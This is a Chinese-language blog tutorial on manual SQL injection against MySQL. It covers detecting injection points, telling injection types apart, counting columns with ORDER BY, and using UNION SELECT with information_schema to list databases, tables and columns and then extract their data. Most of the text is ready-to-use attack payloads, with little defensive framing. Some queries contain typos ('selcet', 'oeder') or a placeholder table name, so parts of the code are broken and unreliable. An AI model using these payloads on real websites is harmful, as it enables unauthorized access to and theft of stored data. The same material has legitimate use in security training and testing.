一起聊聊簡單的sql手工注入過程

本篇文章給大家帶來了關于sql中手工注入的相關問題,其中包括判斷注入點以及判斷注入類型的相關問題,希望對大家有幫助。

一起聊聊簡單的sql手工注入過程

判斷注入點

1.單引號法:直接在網址后面加一個單引號,如果頁面不能正常顯示,瀏覽器返回一些異常信息,則說明該鏈接可能存在sql注入漏洞

2.1=1和1=2:在網址后面的get傳參中加上 and 1=1 ,顯示正常,把1=1替換為1=2,顯示異常,說明網頁存在sql注入。

判斷注入類型

1.數字型注入:注入變量的值不需要用引號引起來,如

select * from user where id=$id;

2.字符型注入:注入變量會用引號包裹起來,如`

select * from user where username='$username';`

注入時注意要閉合引號。
3.搜索型注入:

select * from user where username like '%$pass%';

把sql語句構造為

select * from user where username like '%$pass%' union select語句 '%%';

即傳輸的變量為 pass%’ union select語句 ‘% 形成閉合。

判斷注入點提交方式

通過抓包等方式判斷注入點的提交方式是get,post,還是cookie。

使用order by 查詢字段

使用order by 語句可以查詢出數據庫有多少個字段,可以通過不斷的嘗試來確定數據庫字段數量,如在輸入oeder by 9時,頁面報錯而輸入order by 8時頁面顯示正常,即數據庫中有8個字段。
如查詢語句為:select * from user where id=’$id’;
可以構造下面的輸入:(id = ‘) ‘ order by 3 ‘+–+
即查詢語句為:select * from user where id=” order by 3 ‘–‘

使用聯合查詢來查詢當前數據庫、用戶、版本信息

使用 union select 語句來查詢當前使用用戶 user() , 數據庫database() ,數據庫版本 version() ,服務器操作系統的@@version_compile_os等信息
version版本十分重要,如果版本在5.0以上,就可以使用information_schema庫來輕易的查詢想要的信息
構造語句:

select * from user where id='' union select user(),database(),version()+--+;

查詢當前數據庫中的表,列和值

5.0 版本以上的mysql數據庫自帶的information_schema庫中存儲著數據庫中所有的表名和列明信息。
下面我們就應該根據第五步查詢的當前數據庫的結果(如數據庫為database_1)名下所有的表名tables的信息。
Information_schema.tables :記錄著數據庫中所有表名信息的表。
構造的查詢語句如下:

Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--

查詢的結果為:第五步查詢的當前數據庫中的表名信息。
Information_schema.columns:記錄著數據庫中所有的表中的列名信息;
下面就應該根據上面查詢得到的表名信息(如表為table_1)查詢他的列名信息,構造語句如下:

Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--

查詢出列名后,就可以直接通過聯合查詢查出表中存儲的信息(如查出的列名為column_1,column_2)構造語句

Selcet * from user where id='' union select 1,column_1,column_2 from tables;--

即可查詢出指定數據庫指定表的存儲數據

推薦學習:mysql視頻教程

? 版權聲明
THE END
喜歡就支持一下吧
點贊10 分享